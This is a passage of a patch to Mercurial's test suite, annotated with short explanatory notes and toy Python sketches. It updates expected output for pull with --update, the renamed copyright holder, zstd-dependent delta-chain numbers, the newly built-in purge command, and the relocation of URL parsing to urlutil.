+ | |
+ | o F 2
+ |/
+ o B 1
+ |
+ o A 0
+
+ $ hg log -R ./branch-H-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o H 3
+ |
+ o C 2
+ |
+ o B 1
+ |
+ o A 0
+
+ $ rm -rf ./*-push
+
+
+Test with --update
+==================
+
+update without conflicts
+------------------------
+
+ $ hg clone main-repo test-repo-update --rev 0
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files
+ new changesets 4a2df7238c3b
+ updating to branch default
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+
+We update after each pull, so the first one lands on a branch independent from
+the others and stays there. This is the expected behavior.
+
+ $ hg log -R test-repo-update -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ @ A 0
+
+ $ hg pull -R test-repo-update ./branch-E ./branch-G ./branch-H --update
+ pulling from ./branch-E
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 4 changesets with 4 changes to 4 files
+ new changesets 27547f69f254:a603bfb5a83e
+ 4 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ pulling from ./branch-G
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 2 changesets with 2 changes to 2 files (+1 heads)
+ new changesets 2f3a4c5c1417:c521a06b234b
+ 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ updated to "a603bfb5a83e: E"
+ 1 other heads for branch "default"
+ pulling from ./branch-H
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files (+1 heads)
+ new changesets 40faebb2ec45
+ 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ updated to "a603bfb5a83e: E"
+ 2 other heads for branch "default"
+ $ hg log -R test-repo-update -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o H 7
+ |
+ | @ E 4
+ | |
+ | o D 3
+ |/
+ o C 2
+ |
+ | o G 6
+ | |
+ | o F 5
+ |/
+ o B 1
+ |
+ o A 0
+
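A rough model of the behavior: with --update, 'hg update' runs after every
individual pull, and the checkout only moves along descendants of its current
parent, so the head reached by the first pull (E) wins and the later pulls
merely report the additional heads. Toy ancestry table, not Mercurial's
update logic:

  PARENTS = {"B": "A", "C": "B", "D": "C", "E": "D",
             "F": "B", "G": "F", "H": "C"}

  def descends(node, ancestor):
      while node is not None:
          if node == ancestor:
              return True
          node = PARENTS.get(node)
      return False

  working = "A"
  for source, head in [("./branch-E", "E"),
                       ("./branch-G", "G"),
                       ("./branch-H", "H")]:
      if descends(head, working):
          working = head  # only the first pull moves the working copy
      print("%s: working copy at %s" % (source, working))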
+
+update with conflicts
+---------------------
+
+ $ hg clone main-repo test-repo-conflict --rev 0
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files
+ new changesets 4a2df7238c3b
+ updating to branch default
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+
+The update has a conflict and interrupts the pull.
+
+ $ echo this-will-conflict > test-repo-conflict/D
+ $ hg add -R test-repo-conflict test-repo-conflict/D
+ $ hg log -R test-repo-conflict -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ @ A 0
+
+ $ hg pull -R test-repo-conflict ./branch-E ./branch-G ./branch-H --update
+ pulling from ./branch-E
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 4 changesets with 4 changes to 4 files
+ new changesets 27547f69f254:a603bfb5a83e
+ merging D
+ warning: conflicts while merging D! (edit, then use 'hg resolve --mark')
+ 3 files updated, 0 files merged, 0 files removed, 1 files unresolved
+ use 'hg resolve' to retry unresolved file merges
+ [1]
+ $ hg -R test-repo-conflict resolve -l
+ U D
+ $ hg log -R test-repo-conflict -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ @ E 4
+ |
+ o D 3
+ |
+ o C 2
+ |
+ o B 1
+ |
+ % A 0
+
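The takeaway from this last case, as a small sketch: a merge conflict raised
by the post-pull update aborts the whole multi-source pull, so ./branch-G and
./branch-H are never contacted and the command exits with status 1.
Hypothetical loop, not the actual pull code:

  def pull_all(sources, conflicts_on):
      pulled = []
      for source in sources:
          pulled.append(source)       # the pull itself succeeds
          if source == conflicts_on:  # ...but the update hits a conflict
              print("use 'hg resolve' to retry unresolved file merges")
              return pulled, 1        # remaining sources are skipped
      return pulled, 0

  pulled, status = pull_all(
      ["./branch-E", "./branch-G", "./branch-H"], conflicts_on="./branch-E")
  assert pulled == ["./branch-E"] and status == 1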
--- a/tests/test-extension.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-extension.t Tue Apr 20 11:01:06 2021 -0400
@@ -676,7 +676,7 @@
Mercurial Distributed SCM (version *) (glob)
(see https://mercurial-scm.org for more information)
- Copyright (C) 2005-* Matt Mackall and others (glob)
+ Copyright (C) 2005-* Olivia Mackall and others (glob)
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
@@ -1555,7 +1555,7 @@
Mercurial Distributed SCM (version *) (glob)
(see https://mercurial-scm.org for more information)
- Copyright (C) 2005-* Matt Mackall and others (glob)
+ Copyright (C) 2005-* Olivia Mackall and others (glob)
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
@@ -1566,7 +1566,7 @@
Mercurial Distributed SCM (version *) (glob)
(see https://mercurial-scm.org for more information)
- Copyright (C) 2005-* Matt Mackall and others (glob)
+ Copyright (C) 2005-* Olivia Mackall and others (glob)
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
@@ -1580,7 +1580,7 @@
Mercurial Distributed SCM (version *) (glob)
(see https://mercurial-scm.org for more information)
- Copyright (C) 2005-* Matt Mackall and others (glob)
+ Copyright (C) 2005-* Olivia Mackall and others (glob)
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
@@ -1642,7 +1642,7 @@
Mercurial Distributed SCM (version 3.5.2)
(see https://mercurial-scm.org for more information)
- Copyright (C) 2005-* Matt Mackall and others (glob)
+ Copyright (C) 2005-* Olivia Mackall and others (glob)
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
--- a/tests/test-fix.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-fix.t Tue Apr 20 11:01:06 2021 -0400
@@ -1106,14 +1106,13 @@
$ printf "foo\n" > foo.changed
$ hg commit -Aqm "foo"
- $ hg debugobsolete `hg parents --template '{node}'`
- 1 new obsolescence markers
- obsoleted 1 changesets
+ $ hg ci --amend -m rewritten
$ hg --hidden fix -r 0
abort: fixing obsolete revision could cause divergence
[255]
$ hg --hidden fix -r 0 --config experimental.evolution.allowdivergence=true
+ 2 new content-divergent changesets
$ hg cat -r tip foo.changed
FOO
--- a/tests/test-generaldelta.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-generaldelta.t Tue Apr 20 11:01:06 2021 -0400
@@ -106,22 +106,33 @@
3 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg -R repo debugdeltachain -m
rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio
- 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000
- 1 1 2 0 prev 57 135 161 1.19259 161 0 0.00000
- 2 1 3 1 prev 57 135 218 1.61481 218 0 0.00000
+ 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 (no-zstd !)
+ 1 1 2 0 prev 57 135 161 1.19259 161 0 0.00000 (no-zstd !)
+ 2 1 3 1 prev 57 135 218 1.61481 218 0 0.00000 (no-zstd !)
+ 0 1 1 -1 base 107 135 107 0.79259 107 0 0.00000 (zstd !)
+ 1 1 2 0 prev 57 135 164 1.21481 164 0 0.00000 (zstd !)
+ 2 1 3 1 prev 57 135 221 1.63704 221 0 0.00000 (zstd !)
3 2 1 -1 base 104 135 104 0.77037 104 0 0.00000
$ hg -R usegd debugdeltachain -m
rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio
- 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000
- 1 1 2 0 p1 57 135 161 1.19259 161 0 0.00000
- 2 1 3 1 prev 57 135 218 1.61481 218 0 0.00000
- 3 1 2 0 p1 57 135 161 1.19259 275 114 0.70807
+ 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 (no-zstd !)
+ 1 1 2 0 p1 57 135 161 1.19259 161 0 0.00000 (no-zstd !)
+ 2 1 3 1 prev 57 135 218 1.61481 218 0 0.00000 (no-zstd !)
+ 3 1 2 0 p1 57 135 161 1.19259 275 114 0.70807 (no-zstd !)
+ 0 1 1 -1 base 107 135 107 0.79259 107 0 0.00000 (zstd !)
+ 1 1 2 0 p1 57 135 164 1.21481 164 0 0.00000 (zstd !)
+ 2 1 3 1 prev 57 135 221 1.63704 221 0 0.00000 (zstd !)
+ 3 1 2 0 p1 57 135 164 1.21481 278 114 0.69512 (zstd !)
$ hg -R full debugdeltachain -m
rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio
- 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000
- 1 1 2 0 p1 57 135 161 1.19259 161 0 0.00000
- 2 1 2 0 p1 57 135 161 1.19259 218 57 0.35404
- 3 1 2 0 p1 57 135 161 1.19259 275 114 0.70807
+ 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 (no-zstd !)
+ 1 1 2 0 p1 57 135 161 1.19259 161 0 0.00000 (no-zstd !)
+ 2 1 2 0 p1 57 135 161 1.19259 218 57 0.35404 (no-zstd !)
+ 3 1 2 0 p1 57 135 161 1.19259 275 114 0.70807 (no-zstd !)
+ 0 1 1 -1 base 107 135 107 0.79259 107 0 0.00000 (zstd !)
+ 1 1 2 0 p1 57 135 164 1.21481 164 0 0.00000 (zstd !)
+ 2 1 2 0 p1 57 135 164 1.21481 221 57 0.34756 (zstd !)
+ 3 1 2 0 p1 57 135 164 1.21481 278 114 0.69512 (zstd !)
Test revlog.optimize-delta-parent-choice
@@ -142,9 +153,12 @@
$ hg commit -q -m merge
$ hg debugdeltachain -m
rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio
- 0 1 1 -1 base 59 215 59 0.27442 59 0 0.00000
- 1 1 2 0 prev 61 86 120 1.39535 120 0 0.00000
- 2 1 2 0 p2 62 301 121 0.40199 182 61 0.50413
+ 0 1 1 -1 base 59 215 59 0.27442 59 0 0.00000 (no-zstd !)
+ 1 1 2 0 prev 61 86 120 1.39535 120 0 0.00000 (no-zstd !)
+ 2 1 2 0 p2 62 301 121 0.40199 182 61 0.50413 (no-zstd !)
+ 0 1 1 -1 base 68 215 68 0.31628 68 0 0.00000 (zstd !)
+ 1 1 2 0 prev 70 86 138 1.60465 138 0 0.00000 (zstd !)
+ 2 1 2 0 p2 68 301 136 0.45183 206 70 0.51471 (zstd !)
$ hg strip -q -r . --config extensions.strip=
@@ -154,9 +168,12 @@
$ hg commit -q -m merge --config storage.revlog.optimize-delta-parent-choice=yes
$ hg debugdeltachain -m
rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio
- 0 1 1 -1 base 59 215 59 0.27442 59 0 0.00000
- 1 1 2 0 prev 61 86 120 1.39535 120 0 0.00000
- 2 1 2 0 p2 62 301 121 0.40199 182 61 0.50413
+ 0 1 1 -1 base 59 215 59 0.27442 59 0 0.00000 (no-zstd !)
+ 1 1 2 0 prev 61 86 120 1.39535 120 0 0.00000 (no-zstd !)
+ 2 1 2 0 p2 62 301 121 0.40199 182 61 0.50413 (no-zstd !)
+ 0 1 1 -1 base 68 215 68 0.31628 68 0 0.00000 (zstd !)
+ 1 1 2 0 prev 70 86 138 1.60465 138 0 0.00000 (zstd !)
+ 2 1 2 0 p2 68 301 136 0.45183 206 70 0.51471 (zstd !)
Test that strip bundle use bundle2
$ hg --config extensions.strip= strip .
@@ -267,12 +284,17 @@
46 3 29 45 p1 58 1334 1671 1.25262 1671 0 0.00000
47 3 30 46 p1 58 1380 1729 1.25290 1729 0 0.00000
48 3 31 47 p1 58 1426 1787 1.25316 1787 0 0.00000
- 49 4 1 -1 base 197 316 197 0.62342 197 0 0.00000
- 50 4 2 49 p1 58 362 255 0.70442 255 0 0.00000
- 51 4 3 50 prev 356 594 611 1.02862 611 0 0.00000
- 52 4 4 51 p1 58 640 669 1.04531 669 0 0.00000
+ 49 4 1 -1 base 197 316 197 0.62342 197 0 0.00000 (no-zstd !)
+ 50 4 2 49 p1 58 362 255 0.70442 255 0 0.00000 (no-zstd !)
+ 51 4 3 50 prev 356 594 611 1.02862 611 0 0.00000 (no-zstd !)
+ 52 4 4 51 p1 58 640 669 1.04531 669 0 0.00000 (no-zstd !)
+ 49 4 1 -1 base 205 316 205 0.64873 205 0 0.00000 (zstd !)
+ 50 4 2 49 p1 58 362 263 0.72652 263 0 0.00000 (zstd !)
+ 51 4 3 50 prev 366 594 629 1.05892 629 0 0.00000 (zstd !)
+ 52 4 4 51 p1 58 640 687 1.07344 687 0 0.00000 (zstd !)
53 5 1 -1 base 0 0 0 0.00000 0 0 0.00000
- 54 6 1 -1 base 369 640 369 0.57656 369 0 0.00000
+ 54 6 1 -1 base 369 640 369 0.57656 369 0 0.00000 (no-zstd !)
+ 54 6 1 -1 base 375 640 375 0.58594 375 0 0.00000 (zstd !)
$ hg clone --pull source-repo --config experimental.maxdeltachainspan=2800 relax-chain --config format.generaldelta=yes
requesting all changes
adding changesets
@@ -333,12 +355,17 @@
46 3 29 45 p1 58 1334 1671 1.25262 1671 0 0.00000
47 3 30 46 p1 58 1380 1729 1.25290 1729 0 0.00000
48 3 31 47 p1 58 1426 1787 1.25316 1787 0 0.00000
- 49 4 1 -1 base 197 316 197 0.62342 197 0 0.00000
- 50 4 2 49 p1 58 362 255 0.70442 255 0 0.00000
- 51 2 13 17 p1 58 594 739 1.24411 2781 2042 2.76319
- 52 5 1 -1 base 369 640 369 0.57656 369 0 0.00000
+ 49 4 1 -1 base 197 316 197 0.62342 197 0 0.00000 (no-zstd !)
+ 50 4 2 49 p1 58 362 255 0.70442 255 0 0.00000 (no-zstd !)
+ 51 2 13 17 p1 58 594 739 1.24411 2781 2042 2.76319 (no-zstd !)
+ 52 5 1 -1 base 369 640 369 0.57656 369 0 0.00000 (no-zstd !)
+ 49 4 1 -1 base 205 316 205 0.64873 205 0 0.00000 (zstd !)
+ 50 4 2 49 p1 58 362 263 0.72652 263 0 0.00000 (zstd !)
+ 51 2 13 17 p1 58 594 739 1.24411 2789 2050 2.77402 (zstd !)
+ 52 5 1 -1 base 375 640 375 0.58594 375 0 0.00000 (zstd !)
53 6 1 -1 base 0 0 0 0.00000 0 0 0.00000
- 54 7 1 -1 base 369 640 369 0.57656 369 0 0.00000
+ 54 7 1 -1 base 369 640 369 0.57656 369 0 0.00000 (no-zstd !)
+ 54 7 1 -1 base 375 640 375 0.58594 375 0 0.00000 (zstd !)
$ hg clone --pull source-repo --config experimental.maxdeltachainspan=0 noconst-chain --config format.usegeneraldelta=yes --config storage.revlog.reuse-external-delta-parent=no
requesting all changes
adding changesets
@@ -404,4 +431,5 @@
51 2 13 17 p1 58 594 739 1.24411 2642 1903 2.57510
52 2 14 51 p1 58 640 797 1.24531 2700 1903 2.38770
53 4 1 -1 base 0 0 0 0.00000 0 0 0.00000
- 54 5 1 -1 base 369 640 369 0.57656 369 0 0.00000
+ 54 5 1 -1 base 369 640 369 0.57656 369 0 0.00000 (no-zstd !)
+ 54 5 1 -1 base 375 640 375 0.58594 375 0 0.00000 (zstd !)
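The "(zstd !)" and "(no-zstd !)" suffixes added throughout this file are
conditional-output markers: the test harness keeps an expected line only when
all of its trailing feature conditions hold, which lets a single .t file carry
both compression variants of the delta-chain numbers. A simplified
re-creation of the filtering, not run-tests.py itself:

  import re

  def keep(line, features):
      m = re.search(r"\(([\w -]+) !\)$", line)
      if not m:
          return True  # unconditional expected-output line
      return all(
          (f[3:] not in features) if f.startswith("no-") else (f in features)
          for f in m.group(1).split()
      )

  expected = [
      "0 1 1 -1 base 104 135 104 0.77037 ... (no-zstd !)",
      "0 1 1 -1 base 107 135 107 0.79259 ... (zstd !)",
  ]
  print([l for l in expected if keep(l, {"zstd"})])  # keeps the zstd line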
--- a/tests/test-git-interop.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-git-interop.t Tue Apr 20 11:01:06 2021 -0400
@@ -1,4 +1,4 @@
-#require pygit2
+#require pygit2 no-windows
Setup:
$ GIT_AUTHOR_NAME='test'; export GIT_AUTHOR_NAME
@@ -14,6 +14,7 @@
> git commit "$@" >/dev/null 2>/dev/null || echo "git commit error"
> count=`expr $count + 1`
> }
+ $ git config --global init.defaultBranch master
$ hg version -v --config extensions.git= | grep '^[E ]'
@@ -28,9 +29,9 @@
$ hg status
abort: repository specified git format in .hg/requires but has no .git directory
[255]
+ $ git config --global init.defaultBranch master
$ git init
Initialized empty Git repository in $TESTTMP/nogit/.git/
- $ git config --global init.defaultBranch master
This status invocation shows some hg gunk because we didn't use
`hg init --git`, which fixes up .git/info/exclude for us.
$ hg status
--- a/tests/test-globalopts.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-globalopts.t Tue Apr 20 11:01:06 2021 -0400
@@ -65,6 +65,8 @@
-R with path aliases:
+TODO: add rhg support for path aliases
+#if no-rhg
$ cd c
$ hg -R default identify
8580ff50825a tip
@@ -75,6 +77,7 @@
$ HOME=`pwd`/../ hg -R relativetohome identify
8580ff50825a tip
$ cd ..
+#endif
#if no-outer-repo
@@ -215,6 +218,8 @@
$ hg --cwd c --config paths.quuxfoo=bar paths | grep quuxfoo > /dev/null && echo quuxfoo
quuxfoo
+TODO: add rhg support for detailed exit codes
+#if no-rhg
$ hg --cwd c --config '' tip -q
abort: malformed --config option: '' (use --config section.name=value)
[10]
@@ -230,6 +235,7 @@
$ hg --cwd c --config .b= tip -q
abort: malformed --config option: '.b=' (use --config section.name=value)
[10]
+#endif
Testing --debug:
@@ -264,7 +270,7 @@
Testing --traceback:
-#if no-chg
+#if no-chg no-rhg
$ hg --cwd c --config x --traceback id 2>&1 | grep -i 'traceback'
Traceback (most recent call last):
Traceback (most recent call last): (py3 !)
@@ -351,6 +357,7 @@
addremove add all new files, delete all missing files
files list tracked files
forget forget the specified files on the next commit
+ purge removes files not tracked by Mercurial
remove remove the specified files on the next commit
rename rename files; equivalent of copy + remove
resolve redo merges or set/view the merge status of files
@@ -483,6 +490,7 @@
addremove add all new files, delete all missing files
files list tracked files
forget forget the specified files on the next commit
+ purge removes files not tracked by Mercurial
remove remove the specified files on the next commit
rename rename files; equivalent of copy + remove
resolve redo merges or set/view the merge status of files
--- a/tests/test-graft.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-graft.t Tue Apr 20 11:01:06 2021 -0400
@@ -223,10 +223,6 @@
committing changelog
updating the branch cache
grafting 5:97f8bfe72746 "5"
- all copies found (* = to merge, ! = divergent, % = renamed and deleted):
- on local side:
- src: 'c' -> dst: 'b'
- checking for directory renames
resolving manifests
branchmerge: True, force: True, partial: False
ancestor: 4c60f11aa304, local: 6b9e5368ca4e+, remote: 97f8bfe72746
@@ -240,10 +236,6 @@
$ HGEDITOR=cat hg graft 4 3 --log --debug
scanning for duplicate grafts
grafting 4:9c233e8e184d "4"
- all copies found (* = to merge, ! = divergent, % = renamed and deleted):
- on local side:
- src: 'c' -> dst: 'b'
- checking for directory renames
resolving manifests
branchmerge: True, force: True, partial: False
ancestor: 4c60f11aa304, local: 1905859650ec+, remote: 9c233e8e184d
--- a/tests/test-help-hide.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-help-hide.t Tue Apr 20 11:01:06 2021 -0400
@@ -55,6 +55,7 @@
addremove add all new files, delete all missing files
files list tracked files
forget forget the specified files on the next commit
+ purge removes files not tracked by Mercurial
remove remove the specified files on the next commit
rename rename files; equivalent of copy + remove
resolve redo merges or set/view the merge status of files
@@ -191,6 +192,7 @@
addremove add all new files, delete all missing files
files list tracked files
forget forget the specified files on the next commit
+ purge removes files not tracked by Mercurial
remove remove the specified files on the next commit
rename rename files; equivalent of copy + remove
resolve redo merges or set/view the merge status of files
--- a/tests/test-help.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-help.t Tue Apr 20 11:01:06 2021 -0400
@@ -107,6 +107,7 @@
addremove add all new files, delete all missing files
files list tracked files
forget forget the specified files on the next commit
+ purge removes files not tracked by Mercurial
remove remove the specified files on the next commit
rename rename files; equivalent of copy + remove
resolve redo merges or set/view the merge status of files
@@ -235,6 +236,7 @@
addremove add all new files, delete all missing files
files list tracked files
forget forget the specified files on the next commit
+ purge removes files not tracked by Mercurial
remove remove the specified files on the next commit
rename rename files; equivalent of copy + remove
resolve redo merges or set/view the merge status of files
@@ -375,8 +377,6 @@
mq manage a stack of patches
notify hooks for sending email push notifications
patchbomb command to send changesets as (a series of) patch emails
- purge command to delete untracked files from the working
- directory
relink recreates hardlinks between repository clones
schemes extend schemes with shortcuts to repository swarms
share share a common history between several working directories
@@ -575,7 +575,7 @@
Mercurial Distributed SCM (version *) (glob)
(see https://mercurial-scm.org for more information)
- Copyright (C) 2005-* Matt Mackall and others (glob)
+ Copyright (C) 2005-* Olivia Mackall and others (glob)
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
@@ -1069,6 +1069,7 @@
debugsetparents
manually set the parents of the current working directory
(DANGEROUS)
+ debugshell run an interactive Python interpreter
debugsidedata
dump the side data for a cl/manifest/file revision
debugssl test a secure connection to a server
@@ -1832,7 +1833,7 @@
These symbolic names can be used from the command line. To pull from
"my_server": 'hg pull my_server'. To push to "local_path": 'hg push
- local_path'.
+ local_path'. You can check 'hg help urls' for details about valid URLs.
Options containing colons (":") denote sub-options that can influence
behavior for that specific path. Example:
@@ -1841,6 +1842,9 @@
my_server = https://example.com/my_path
my_server:pushurl = ssh://example.com/my_path
+ Paths using the 'path://otherpath' scheme will inherit the sub-options
+ value from the path they point to.
+
The following sub-options can be defined:
"pushurl"
@@ -2720,6 +2724,13 @@
set or show the current phase name
</td></tr>
<tr><td>
+ <a href="/help/purge">
+ purge
+ </a>
+ </td><td>
+ removes files not tracked by Mercurial
+ </td></tr>
+ <tr><td>
<a href="/help/recover">
recover
</a>
--- a/tests/test-hg-parseurl.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-hg-parseurl.py Tue Apr 20 11:01:06 2021 -0400
@@ -2,44 +2,48 @@
import unittest
-from mercurial import hg
+from mercurial.utils import urlutil
class ParseRequestTests(unittest.TestCase):
def testparse(self):
self.assertEqual(
- hg.parseurl(b'http://example.com/no/anchor'),
+ urlutil.parseurl(b'http://example.com/no/anchor'),
(b'http://example.com/no/anchor', (None, [])),
)
self.assertEqual(
- hg.parseurl(b'http://example.com/an/anchor#foo'),
+ urlutil.parseurl(b'http://example.com/an/anchor#foo'),
(b'http://example.com/an/anchor', (b'foo', [])),
)
self.assertEqual(
- hg.parseurl(b'http://example.com/no/anchor/branches', [b'foo']),
+ urlutil.parseurl(
+ b'http://example.com/no/anchor/branches', [b'foo']
+ ),
(b'http://example.com/no/anchor/branches', (None, [b'foo'])),
)
self.assertEqual(
- hg.parseurl(b'http://example.com/an/anchor/branches#bar', [b'foo']),
+ urlutil.parseurl(
+ b'http://example.com/an/anchor/branches#bar', [b'foo']
+ ),
(b'http://example.com/an/anchor/branches', (b'bar', [b'foo'])),
)
self.assertEqual(
- hg.parseurl(
+ urlutil.parseurl(
b'http://example.com/an/anchor/branches-None#foo', None
),
(b'http://example.com/an/anchor/branches-None', (b'foo', [])),
)
self.assertEqual(
- hg.parseurl(b'http://example.com/'),
+ urlutil.parseurl(b'http://example.com/'),
(b'http://example.com/', (None, [])),
)
self.assertEqual(
- hg.parseurl(b'http://example.com'),
+ urlutil.parseurl(b'http://example.com'),
(b'http://example.com/', (None, [])),
)
self.assertEqual(
- hg.parseurl(b'http://example.com#foo'),
+ urlutil.parseurl(b'http://example.com#foo'),
(b'http://example.com/', (b'foo', [])),
)
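Condensing the assertions above: parseurl() normalizes a bare host to a
trailing-slash URL, splits a #fragment off as the requested branch, and passes
an optional default-branch list through when no fragment overrides it. A
quick check, assuming a Mercurial checkout is importable:

  from mercurial.utils import urlutil

  url, (branch, heads) = urlutil.parseurl(b"http://example.com#foo")
  assert url == b"http://example.com/"  # trailing slash normalized
  assert branch == b"foo"               # fragment becomes the branch
  assert heads == []                    # no default branches supplied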
--- a/tests/test-hgrc.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-hgrc.t Tue Apr 20 11:01:06 2021 -0400
@@ -59,7 +59,7 @@
#if unix-permissions no-root
$ chmod u-r $TESTTMP/included
$ hg showconfig section
- config error at $TESTTMP/hgrc:2: cannot include $TESTTMP/included (Permission denied)
+ config error at $TESTTMP/hgrc:2: cannot include $TESTTMP/included (Permission denied*) (glob)
[255]
#endif
@@ -84,7 +84,7 @@
Mercurial Distributed SCM (version *) (glob)
(see https://mercurial-scm.org for more information)
- Copyright (C) 2005-* Matt Mackall and others (glob)
+ Copyright (C) 2005-* Olivia Mackall and others (glob)
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$ unset FAKEPATH
--- a/tests/test-hgweb-auth.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-hgweb-auth.py Tue Apr 20 11:01:06 2021 -0400
@@ -10,7 +10,10 @@
url,
util,
)
-from mercurial.utils import stringutil
+from mercurial.utils import (
+ stringutil,
+ urlutil,
+)
urlerr = util.urlerr
urlreq = util.urlreq
@@ -60,7 +63,7 @@
print('URI:', pycompat.strurl(uri))
try:
pm = url.passwordmgr(ui, urlreq.httppasswordmgrwithdefaultrealm())
- u, authinfo = util.url(uri).authinfo()
+ u, authinfo = urlutil.url(uri).authinfo()
if authinfo is not None:
pm.add_password(*_stringifyauthinfo(authinfo))
print(
@@ -198,10 +201,12 @@
def testauthinfo(fullurl, authurl):
print('URIs:', fullurl, authurl)
pm = urlreq.httppasswordmgrwithdefaultrealm()
- ai = _stringifyauthinfo(util.url(pycompat.bytesurl(fullurl)).authinfo()[1])
+ ai = _stringifyauthinfo(
+ urlutil.url(pycompat.bytesurl(fullurl)).authinfo()[1]
+ )
pm.add_password(*ai)
print(pm.find_user_password('test', authurl))
-print('\n*** Test urllib2 and util.url\n')
+print('\n*** Test urllib2 and urlutil.url\n')
testauthinfo('http://user@example.com:8080/foo', 'http://example.com:8080/foo')
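A hedged condensation of testauthinfo() above, assuming Mercurial's packages
are importable (the test's _stringifyauthinfo helper, which coerces the bytes
tuple to str for the py3 password manager, is elided):

  from mercurial import util
  from mercurial.utils import urlutil

  urlreq = util.urlreq
  pm = urlreq.httppasswordmgrwithdefaultrealm()
  # authinfo() strips the credentials out of the URL and returns them in
  # a tuple shaped for pm.add_password(realm, uris, user, password).
  u, authinfo = urlutil.url(b"http://user@example.com:8080/foo").authinfo()
  print(u)         # the URL itself no longer carries user/password
  print(authinfo)  # once registered, a later bare URL matches:
  # pm.find_user_password('test', 'http://example.com:8080/foo')
  # returns ('user', '') per test-hgweb-auth.py.out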
--- a/tests/test-hgweb-auth.py.out Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-hgweb-auth.py.out Tue Apr 20 11:01:06 2021 -0400
@@ -211,7 +211,7 @@
URI: http://example.org/foo
abort
-*** Test urllib2 and util.url
+*** Test urllib2 and urlutil.url
URIs: http://user@example.com:8080/foo http://example.com:8080/foo
('user', '')
--- a/tests/test-hgweb-commands.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-hgweb-commands.t Tue Apr 20 11:01:06 2021 -0400
@@ -2193,7 +2193,8 @@
lookup
pushkey
stream-preferred
- streamreqs=generaldelta,revlogv1,sparserevlog
+ streamreqs=generaldelta,revlogv1,sparserevlog (no-rust !)
+ streamreqs=generaldelta,persistent-nodemap,revlogv1,sparserevlog (rust !)
unbundle=HG10GZ,HG10BZ,HG10UN
unbundlehash
--- a/tests/test-hgweb-filelog.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-hgweb-filelog.t Tue Apr 20 11:01:06 2021 -0400
@@ -656,7 +656,7 @@
An error occurred while processing your request:
</p>
<p>
- a@6563da9dcf87: not found in manifest
+ a@6563da9dcf87b1949716e38ff3e3dfaa3198eb06: not found in manifest
</p>
</div>
</div>
--- a/tests/test-hgweb-json.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-hgweb-json.t Tue Apr 20 11:01:06 2021 -0400
@@ -2190,6 +2190,10 @@
"topic": "phase"
},
{
+ "summary": "removes files not tracked by Mercurial",
+ "topic": "purge"
+ },
+ {
"summary": "roll back an interrupted transaction",
"topic": "recover"
},
--- a/tests/test-hgweb.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-hgweb.t Tue Apr 20 11:01:06 2021 -0400
@@ -149,7 +149,7 @@
404 Not Found
- error: bork@2ef0ac749a14: not found in manifest
+ error: bork@2ef0ac749a14e4f57a5a822464a0902c6f7f448f: not found in manifest
[1]
$ get-with-headers.py localhost:$HGPORT 'file/tip/bork'
404 Not Found
@@ -202,7 +202,7 @@
An error occurred while processing your request:
</p>
<p>
- bork@2ef0ac749a14: not found in manifest
+ bork@2ef0ac749a14e4f57a5a822464a0902c6f7f448f: not found in manifest
</p>
</div>
</div>
@@ -218,7 +218,7 @@
404 Not Found
- error: bork@2ef0ac749a14: not found in manifest
